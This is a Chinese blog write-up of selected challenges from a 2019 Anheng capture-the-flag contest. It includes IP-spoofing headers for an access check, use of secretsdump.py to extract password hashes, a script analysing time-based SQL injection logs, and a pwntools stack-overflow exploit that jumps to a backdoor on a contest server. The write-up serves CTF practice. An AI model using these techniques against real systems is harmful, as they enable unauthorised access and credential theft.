2019年安恒 6月月赛 部分题目笔记

题目链接:
https://github.com/Dong555/Anheng_cup_month/tree/master/2019-06

目录

Web

  • 0x01 Web1

Misc

  • 0x01 简单的日志分析
  • 0x02 我的密码

Reverse

  • 0x01 又是crackme
  • 0x02 re你快乐吗

Crypto

  • 0x01 石头剪子布
  • 0x02 你认识我吗

Pwn

  • 0x01 魔法,为我而存在

正文

Web

0x01 Web1

这题好坑啊,试了以下所有:

Client-IP: 127.0.0.1

X-Client-IP: 127.0.0.1

X-Forwarded-For: 127.0.0.1

X-Originating-IP: 127.0.0.1

X-Real-IP: 127.0.0.1

X-Remote-Addr: 127.0.0.1

X-Remote-IP: 127.0.0.1

并且加上了 host:127.0.0.1 就是没有试localhost,我错了

image

Misc

0x01 简单的日志分析

延时注入的acces日志分析,失败的字符如下图所示:

image

成功的字符如下图所示:

image

写代码分析一下更快速,只写了一部分:


#!/usr/bin/env python

# -*- coding: utf-8 -*-

import urllib

ACCESS_LOG_FILE = 'file'

def ch164(fp):

    flag = [[0,0,0,0,0,0,0,0] for i in range(38)]

    b64 = []

    with open(fp, 'r') as f:

        for line in f:

            line = line.strip()

            if len(line) == 0: continue

            if 'f1ag' not in line: continue

            p = line.split(' ')

0x02 我的密码

使用 secretsdump.py 来获取用户的hash密码,到在线网站进行解密,得到最后结果为123qwe

image
image

Reverse

0x01 又是crackme

在OD中动态调试可得:

image

0x02 re你快乐吗

迷宫题,把迷宫画出来走就完事了:


maze = [0x00, 0x8,0x1,0xe,0xb,0x7,0x10,0x1,0xb,0xf,0xf,0x1,0x1,0x9,0x1,0x1,0x1,0x1,0x1,0x1,0xb,0x1,0xc,0xc,0x8,0xe,0x1,0x8,0x1,0x8,0x1,0x1,0xc,0x9,0xe,0x1,0xd,0x8,0xb,0x1,0x1,0x1,0x1,0x1,0x1,0x9,0xa,0x9,0x9,0x63,0x0,0x0,0x0]

for i in range(1, len(maze)):

    print("{:02x}".format(maze[i]), end = " ")

    if i % 7 == 0:

        print()

image

Crypto

0x01 石头剪子布

每轮次出的是固定的,只需要记录20次,就可以获得完整的字符串,之后直接解栅栏密码。

image

脚本如下:

#coding:utf-8
from pwn import *
import re

context.log_level='debug'

p=remote("101.71.29.5",10013)

p.recvuntil("(1)")

flag=''

def fun(x,flag):
    p.sendline(x)
    res=p.recv()
    print res
    res=re.findall(r"<< (.*) >>",res)[0]
    return res

p.recvuntil("=============================\n")

a=[2,1,1,2,0,0,0,1,2,2,1,0,1,2,0,1,2,1,1,2]

for i in a:
    res=fun(str(i),flag)
    flag+=res

print flag
p.interactive()

image

0x02 你认识我吗

通过观察加密过程可以看出来这是一个简单的列替换密码,只需要在列上找到flag{,通过有意义的flag字符串拼凑就可以得到密钥

脚本如下:


a=["yostfYz","idihiaA","shlcg_g","nksiogm","knifn{a","tutnpfe","hlhstl_","Iotmysr","hauriA}","owceloi","utonaun"]

b='y o s t f Y z i d i h i a A s h l c g _ g n k s i o g m k n i f n { a t u t n p f e h l h s t l _ I o t m y s r h a u r i A } o w c e l o i u t o n a u n'

flag=''

c=[7,5,6,1,3,4,0,9,10,2,8]

for i in c:

    print a[i]

for j in range(7):

    for i in c:

        s=a[i]

        flag+=s[j]

print f

image

Pwn

0x01 魔法,为我而存在

漏洞在输入4后,进入的函数里read的字节超过了buf的长度导致了栈溢出,直接控制程序跳到题目预留的后门函数即可。

脚本如下:


from pwn import *

context.log_level='debug'

context.terminal=["tmux","splitw","-h"]

p=remote("101.71.29.5",10001)

elf=ELF('./magicc')

cat_addr=0x080485A7

p.recvuntil("Choose!\n")

p.sendline('4')

p.recvuntil("You are one step short of success\n")

paylaod='a'*22 + p32(cat_addr)

p.sendline(paylaod)

p.interactive()

image
最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 215,076评论 6 497
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 91,658评论 3 389
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 160,732评论 0 350
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 57,493评论 1 288
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 66,591评论 6 386
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 50,598评论 1 293
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 39,601评论 3 415
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 38,348评论 0 270
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 44,797评论 1 307
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 37,114评论 2 330
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 39,278评论 1 344
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 34,953评论 5 339
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 40,585评论 3 322
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 31,202评论 0 21
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,442评论 1 268
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 47,180评论 2 367
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 44,139评论 2 352